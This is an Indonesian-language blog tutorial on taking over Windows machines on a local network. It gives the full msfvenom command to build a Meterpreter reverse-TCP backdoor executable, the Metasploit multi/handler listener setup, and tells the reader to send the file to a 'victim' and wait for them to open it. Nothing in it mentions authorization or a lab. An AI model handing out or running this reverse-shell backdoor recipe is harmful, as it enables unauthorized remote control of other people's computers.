Tutorial Exploit Windows pada LAN


Hari ini kita akan belajar bagaimana cara hack exploit windows, entah windows xp, windows 7/8/10 dengan teknik backdoor pada jaringan lokal LAN dengan menggunakan OS berbasis linus seperti kali linux, ubuntu atau lainnya.

Pertama apa yang dimaksud exploit atau eksploitasi? Exploit (dari kata kerja bahasa Inggris exploit, yang berarti "menggunakan sesuatu untuk keuntungan seseorang sendiri") adalah sebuah script code yang menyerang keamanan komputer, juga software, produk-produk elektronik lain secara spesifik. Bisa juga dikatakan sebuah perangkat lunak yang menyerang kerentanan keamanan (security vulnerability) yang spesifik namun serangan ini tidak selalu bertujuan untuk melancarkan aksi yang tidak diinginkan. Serangan exploit seperti ini sering mencakup hal-hal seperti mendapatkan kontrol terhadap sistem komputer, mendapat hak akses (privilege escalation), atau terkait serangan denial-of-service (DoS atau terkait DDoS).

Kedua, apa yang dimaksud dengan backdoor? Backdoor adalah sebuah metode, yang seringkali bersifat rahasia, melewati otentikasi normal pada sebuah produk, sistem komputer, kriptosistem atau algoritma dll. Backdoors sering digunakan untuk melakukan remote access yang tidak sah ke sebuah komputer, atau mendapatkan akses ke plaintext dalam sistem kriptografi.

Bagaimana cara buat Backdoor untuk Exploit Windows pada LAN?


Baiklah sebelum kita mulai exploit windows, persiapkan alat berikut yang akan kita gunakan.
  1. OS (disarankan: Linux seperti Kali linux, Backtrack, dll)
  2. Metasploit (jika anda menggunakan windows coba download pentestbox atau gunakan vbox)
  3. Local Area Network (seperti wifi)
Sekarang persiapannya sudah lengkap, pindah ke langkah-langkah selanjutnya.

Pertama anda perlu membuat backdoor, bagaimana cara membuat backdoor, anda bisa menggunakan tool msfvenomfatratnetool, dll.
Disini yang saya gunakan adalah msfvenom.
Buka terminal dan ketik
msfvenom -p windows/meterpreter/reverse_tcp lhost=yourip lport=port R > backdoor.exe
Contoh: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.14 lport=4444 R > backdoor.exe

*Ketik ifconfig jika anda ingin mengetahui alamat ip anda.

Baiklah sampai disini backdoor Anda siap untuk digunakan, selanjutnya kita perlu memulai listener, kita akan menggunakan Metasploit. (FYI: Metasploit apk juga tersedia untuk Android)
Buka terminal dan ketik
msfconsole
Kemudian ketik lagi kode berikut
use multi/handler 
set payload windows/meterpreter/reverse_tcp 
set IpAddressAnda lhost 
set lport PortAnda 
exploit. 

Setelah kita membuat listener, kirim backdoor ke target / korban dan tunggu hingga korban Anda membukanya. Setelah target membuka backdoor ini, Anda akan mendapatkan sesi meterpreter (meterpreter session) dengan artian bahwa Anda sudah bisa mengendalikan komputer korban (victim).
Terimakasih sudah membaca tips trik Windows Hacking cara hacking: Tutorial Exploit Windows pada LAN.

0 Response to "Tutorial Exploit Windows pada LAN"

Post a Comment